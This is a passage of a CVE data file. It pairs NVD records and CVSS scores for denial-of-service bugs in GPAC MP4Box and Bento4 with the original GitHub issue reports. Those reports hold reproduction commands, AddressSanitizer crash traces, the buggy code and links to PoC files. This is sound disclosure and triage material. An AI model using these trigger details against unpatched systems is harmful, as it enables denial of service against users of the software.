fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c347fff9540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ```
heap-buffer-overflow in MP4Box at filter_core/filter.c:1454
https://api.github.com/repos/gpac/gpac/issues/1908/comments
1
2021-09-07T10:07:06Z
2021-09-07T12:49:31Z
https://github.com/gpac/gpac/issues/1908
989,818,036
1,908
CVE-2021-40606
2022-06-28T13:15:09.740
The gf_bs_write_data function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1885" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1885
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a memcpy from unknown addrees bug. Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba2689-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc_isom_hinter -out /dev/null Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ================================================================= ==194694==ERROR: AddressSanitizer: unknown-crash on address 0x03e8ef58ac20 at pc 0x0000004a3cd7 bp 0x7ffdef589370 sp 0x7ffdef588b38 READ of size 24912 at 0x03e8ef58ac20 thread T0 #0 0x4a3cd6 in __asan_memcpy (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a3cd6) #1 0x7f35556d80ef in gf_bs_write_data /home/lly/pro/gpac_public/src/utils/bitstream.c:1028:4 #2 0x7f3555da5a1a in gf_odf_write_default /home/lly/pro/gpac_public/src/odf/odf_code.c:1320:3 #3 0x7f3555da92ec in gf_odf_desc_write_bs /home/lly/pro/gpac_public/src/odf/odf_codec.c:325:6 #4 0x7f3555da92ec in gf_odf_desc_write /home/lly/pro/gpac_public/src/odf/odf_codec.c:343:6 #5 0x7f3555da9661 in gf_odf_desc_copy /home/lly/pro/gpac_public/src/odf/odf_codec.c:387:6 #6 0x7f3555cb8760 in gf_isom_set_extraction_slc /home/lly/pro/gpac_public/src/isomedia/isom_write.c:5468:9 #7 0x7f3555fa467b in gf_hinter_finalize /home/lly/pro/gpac_public/src/media_tools/isom_hinter.c:1245:5 #8 0x4e8d21 in HintFile /home/lly/pro/gpac_public/applications/mp4box/main.c:3550:2 #9 0x4f5988 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6329:7 #10 0x7f355476d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x429a6d in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429a6d) Address 0x03e8ef58ac20 is located in the high shadow area. ``` Buggy code in bitstream.c: ``` u32 gf_bs_write_data(GF_BitStream *bs, const u8 *data, u32 nbBytes) { ... memcpy(bs->original + bs->position - bs->bytes_out, data, nbBytes); <---data is not inited ... } ``` [poc.zip](https://github.com/gpac/gpac/files/7036109/poc.zip)
Bug: Memcpy from unknown addrees in MP4BOX at src/utils/bitstream.c:1028
https://api.github.com/repos/gpac/gpac/issues/1885/comments
0
2021-08-24T02:45:45Z
2021-08-30T15:33:43Z
https://github.com/gpac/gpac/issues/1885
977,647,480
1,885
CVE-2021-40607
2022-06-28T13:15:09.797
The schm_box_size function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1879" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1879
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a heap-buffer-overflow bug caused by missing '\0' check of the end of URI. **Step to reproduce:** 1.get latest commit code (MP4Box - GPAC version 1.1.0-DEV-rev1169-gbbd741e-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc -out /dev/null **Env:** Ubunut 20.04 , clang 10.0.0 **ASAN report** ``` ==789683==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000bb7 at pc 0x7f277ca50a6d bp 0x7ffd14f790b0 sp 0x7ffd14f78858 READ of size 40 at 0x604000000bb7 thread T0 #0 0x7f277ca50a6c (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) #1 0x7f277a6d0ece in schm_box_size isomedia/box_code_drm.c:179 #2 0x7f277a7569f1 in gf_isom_box_size_listing isomedia/box_funcs.c:1903 #3 0x7f277a7569f1 in gf_isom_box_size isomedia/box_funcs.c:1915 #4 0x7f277a805c14 in WriteInterleaved isomedia/isom_store.c:1870 #5 0x7f277a8086d3 in WriteToFile isomedia/isom_store.c:2527 #6 0x7f277a7a73d9 in gf_isom_write isomedia/isom_read.c:600 #7 0x7f277a7a778f in gf_isom_close isomedia/isom_read.c:624 #8 0x562161c082db in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6401 #9 0x7f27799da0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #10 0x562161bd2bdd in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4abdd) 0x604000000bb7 is located 0 bytes to the right of 39-byte region [0x604000000b90,0x604000000bb7) allocated by thread T0 here: #0 0x7f277caf6bc8 in malloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dbc8) #1 0x7f277a6d08b7 in schm_box_read isomedia/box_code_drm.c:148 SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x67a6c) Shadow bytes around the buggy address: 0x0c087fff8120: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff8130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fff8140: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 01 0x0c087fff8150: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 05 fa 0x0c087fff8160: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 02 fa =>0x0c087fff8170: fa fa 00 00 00 00[07]fa fa fa 00 00 00 00 00 00 0x0c087fff8180: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff81c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa ``` **Buggy code and reason:** ``` GF_Err schm_box_size(GF_Box *s) { GF_SchemeTypeBox *ptr = (GF_SchemeTypeBox *) s; if (!s) return GF_BAD_PARAM; ptr->size += 8; if (ptr->flags & 0x000001) ptr->size += 1 + (ptr->URI ? strlen(ptr->URI) : 0); <---strlen overflow once URI does not end with '\0' return GF_OK; } ``` [poc.zip](https://github.com/gpac/gpac/files/7011391/poc.zip)
BUG: heap-buffer-overflow in MP4Box at src/isomedia/schm_box_size:179
https://api.github.com/repos/gpac/gpac/issues/1879/comments
0
2021-08-19T02:52:37Z
2021-08-30T15:33:42Z
https://github.com/gpac/gpac/issues/1879
974,213,413
1,879
CVE-2021-40608
2022-06-28T13:15:09.840
The gf_hinter_track_finalize function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1883" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1883
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a pointer free on unknown addrees bug caused by freeing a uninitialized pointer. Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX -hint poc_isom_hinter -out /dev/null Env: Ubunut 20.04 , clang 10.0.0 ASAN report ``` ==40495==ERROR: AddressSanitizer: SEGV on unknown address 0x7f0eebe5ccf8 (pc 0x7f0eef8765fc bp 0x7f0eebe5ccf8 sp 0x7ffecbe40880 T0) #0 0x7f0eef8765fb (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x215fb) #1 0x7f0eef8ed29d in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9829d) #2 0x7f0eed579cb9 in gf_hinter_track_finalize media_tools/isom_hinter.c:956 #3 0x42842d in HintFile /home/lly/gpac_public/applications/mp4box/main.c:3533 #4 0x42e4e4 in mp4boxMain /home/lly/gpac_public/applications/mp4box/main.c:6329 #5 0x7f0eead8983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #6 0x413bc8 in _start (/home/lly/gpac_public/bin/gcc/MP4Box+0x413bc8) ``` Buggy code and reason: in isom_hinter.c:950 ``` for (i=0; i<gf_isom_get_sample_description_count(tkHint->file, tkHint->TrackNum); i++) { u8 *tx3g; <---with out init ... gf_isom_text_get_encoded_tx3g(..., &tx3g, &tx3g_len); <--- supposed to init tx3g ... gf_free(tx3g); <--- free tx3g ... } ``` It is supposed to init tx3g in gf_isom_text_get_encoded_tx3g, but in gf_isom_text_get_encoded_tx3g, it might forget that mission. ``` GF_Err gf_isom_text_get_encoded_tx3g(GF_ISOFile *file, u32 track, u32 sidx, u32 sidx_offset, u8 **tx3g, u32 *tx3g_size) { ... // it returns without init tx3g once a->type equals another value; if ((a->type != GF_ISOM_BOX_TYPE_TX3G) && (a->type != GF_ISOM_BOX_TYPE_TEXT)) return GF_BAD_PARAM; ... *tx3g = NULL; <--- real init here *tx3g_size = 0; gf_bs_get_content(bs, tx3g, tx3g_size); gf_bs_del(bs); return GF_OK; } ``` [poc_isom_hinter.zip](https://github.com/gpac/gpac/files/7019247/poc_isom_hinter.zip)
BUG : free on unknown addrees in MP4BOX at gf_hinter_track_finalize media_tools/isom_hinter.c:956
https://api.github.com/repos/gpac/gpac/issues/1883/comments
0
2021-08-20T05:15:45Z
2021-08-30T15:33:43Z
https://github.com/gpac/gpac/issues/1883
975,274,297
1,883
CVE-2021-40609
2022-06-28T13:15:09.880
The GetHintFormat function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1894" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "CCC969A1-3F88-40F5-B4A1-54DA05DF081E", "versionEndExcluding": "2.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1894
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). It's a heap-buffer-overflow bug Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master) 2.compile with --enable-sanitizer 3.run ./MP4BOX info poc Env: Ubunut 20.04 , clang 12.0.1 ASAN report ``` ==2275020==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000638 at pc 0x7f1c17ca68a4 bp 0x7ffd52eab1d0 sp 0x7ffd52eab1c8 READ of size 4 at 0x604000000638 thread T0 #0 0x7f1c17ca68a3 in GetHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 #1 0x7f1c17ca68a3 in CheckHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:58:6 #2 0x7f1c17ca68a3 in gf_isom_get_payt_count /home/lly/pro/gpac_public/src/isomedia/hint_track.c:979:7 #3 0x5b52e5 in DumpTrackInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3178:14 #4 0x5e4af1 in DumpMovieInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3789:3 #5 0x52ea16 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6023:9 #6 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x429aad in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429aad) 0x604000000638 is located 0 bytes to the right of 40-byte region [0x604000000610,0x604000000638) allocated by thread T0 here: #0 0x4a496d in malloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a496d) #1 0x7f1c17543a17 in nmhd_box_new /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:4651:2 #2 0x7f1c1775de4f in gf_isom_box_new_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1673:6 #3 0x7f1c17756209 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:239:12 #4 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #5 0x7f1c1751e43a in minf_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3527:6 #6 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #7 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #8 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #9 0x7f1c17511b3d in mdia_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3078:6 #10 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #11 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #12 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #13 0x7f1c17582c10 in trak_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:6734:6 #14 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #15 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #16 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7 #17 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9 #18 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14 #19 0x7f1c177548b9 in gf_isom_parse_root_box /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:38:8 #20 0x7f1c177e2347 in gf_isom_parse_movie_boxes_internal /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:320:7 #21 0x7f1c177e2347 in gf_isom_parse_movie_boxes /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:781:6 #22 0x7f1c177f84d3 in gf_isom_open_file /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:901:19 #23 0x53c4b8 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5841:12 #24 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 in GetHintFormat Shadow bytes around the buggy address: 0x0c087fff8070: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 00 0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8090: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80a0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80b0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 =>0x0c087fff80c0: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 00 0x0c087fff80d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff80e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa 0x0c087fff80f0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8100: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ``` [poc.zip](https://github.com/gpac/gpac/files/7051614/poc.zip)
heap-buffer-overflow in MP4BOX at souce file src/isomedia/hint_track.c:46
https://api.github.com/repos/gpac/gpac/issues/1894/comments
0
2021-08-26T04:44:12Z
2021-08-30T15:33:44Z
https://github.com/gpac/gpac/issues/1894
979,828,664
1,894
CVE-2021-40943
2022-06-28T13:15:09.920
In Bento4 1.6.0-638, there is a null pointer reference in the function AP4_DescriptorListInspector::Action function in Ap4Descriptor.h:124 , as demonstrated by GPAC. This can cause a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/643" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-638:*:*:*:*:*:*:*", "matchCriteriaId": "2122DA5E-A523-4D07-B017-982DF2B8B829", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/643
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
How to reproduce: ``` 1.check out latest code, 5922ba762a 2.compile with asan, set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address -g") set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address -g") 3.run ./mp4dump --verbosity 3 --format text poc ``` You can see the asan information below: ``` ================================================================= ==633802==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000003c3e48 bp 0x7ffcbc9d4550 sp 0x7ffcbc9d4470 T0) ==633802==The signal is caused by a READ memory access. ==633802==Hint: address points to the zero page. #0 0x3c3e48 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 #1 0x40bdc2 in AP4_List<AP4_Descriptor>::Apply(AP4_List<AP4_Descriptor>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #2 0x40bdc2 in AP4_InitialObjectDescriptor::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ObjectDescriptor.cpp:327:22 #3 0x3e0485 in AP4_IodsAtom::InspectFields(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4IodsAtom.cpp:112:29 #4 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #5 0x39f0a2 in AP4_AtomListInspector::Action(AP4_Atom*) const /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.h:601:15 #6 0x39d3b1 in AP4_List<AP4_Atom>::Apply(AP4_List<AP4_Atom>::Item::Operator const&) const /home/lly/pro/Bento4/Source/C++/Core/Ap4List.h:353:12 #7 0x39d3b1 in AP4_ContainerAtom::InspectChildren(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:220:16 #8 0x37117e in AP4_Atom::Inspect(AP4_AtomInspector&) /home/lly/pro/Bento4/Source/C++/Core/Ap4Atom.cpp:263:5 #9 0x359b43 in main /home/lly/pro/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:350:15 #10 0x7f899655d0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x2a2b1d in _start (/home/lly/pro/Bento4/cmakebuild/mp4dump+0x2a2b1d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/Bento4/Source/C++/Core/Ap4Descriptor.h:124:21 in AP4_DescriptorListInspector::Action(AP4_Descriptor*) const ==633802==ABORTING ``` [poc.zip](https://github.com/axiomatic-systems/Bento4/files/7043072/poc.zip)
Null pointer reference in Ap4Descriptor.h:124
https://api.github.com/repos/axiomatic-systems/Bento4/issues/643/comments
0
2021-08-25T02:00:03Z
2021-08-25T02:00:03Z
